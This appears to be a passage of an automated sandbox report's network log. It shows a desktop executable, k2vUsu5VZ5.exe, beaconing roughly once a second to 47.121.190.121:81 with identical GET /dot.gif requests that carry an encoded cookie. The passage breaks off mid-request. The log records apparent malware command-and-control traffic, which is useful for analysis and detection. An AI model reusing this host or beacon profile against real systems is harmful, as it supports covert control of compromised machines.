              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:25.509737015 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:25 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 26 | Source IP: 192.168.2.4 | Source Port: 49762 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:25.622783899 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:26.690182924 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:26 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              27192.168.2.44976347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:26.825442076 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:27.760310888 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:27 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              28192.168.2.44976447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:27.875926018 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:28.944737911 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:28 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              29192.168.2.44976547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:29.060045958 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:30.022381067 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:29 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              30192.168.2.44976647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:30.139976025 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:31.133658886 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:30 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              31192.168.2.44976747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:31.251285076 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:32.192966938 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:32 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              32192.168.2.44976847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:32.309835911 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:33.245162010 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:33 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              33192.168.2.44976947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:33.356292009 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:34.335721016 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:34 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              34192.168.2.44977047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:34.450592041 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:35.858690023 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:35 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              35192.168.2.44977147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:35.981336117 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:36.989368916 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:36 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              36192.168.2.44977247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:37.106453896 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:38.061669111 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:37 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              37192.168.2.44977347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:38.210406065 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:39.150245905 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:38 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              38192.168.2.44977447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:39.263084888 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:40.326354027 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:40 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              39192.168.2.44977547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:40.450764894 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:41.578259945 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:41 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              40192.168.2.44977647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:41.700495005 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:42.676697969 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:42 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              41192.168.2.44977747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:42.920033932 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:43.851610899 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:43 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              42192.168.2.44977847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:44.067008972 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:45.015392065 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:44 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              43192.168.2.44977947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:45.139488935 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:46.156102896 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:45 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              44192.168.2.44978047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:46.291229963 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:47.259114981 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:47 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              45192.168.2.44978147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:47.372627974 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:48.474929094 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:48 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              46192.168.2.44978247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:48.591087103 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:49.569186926 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:49 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              47192.168.2.44978347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:49.684834957 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:50.687247038 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:50 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              48192.168.2.44978547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:50.809571028 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:51.895996094 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:51 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              49192.168.2.44978647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:52.012828112 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:53.001020908 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:52 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              50192.168.2.44978747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:53.126132965 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:54.063759089 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:53 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              51192.168.2.44978947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:54.184781075 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:55.153366089 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:54 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              52192.168.2.44979547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:55.279933929 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:56.241408110 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:56 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              53192.168.2.44980147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:56.376281977 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:57.316638947 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:57 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              54192.168.2.44980747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:57.434493065 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
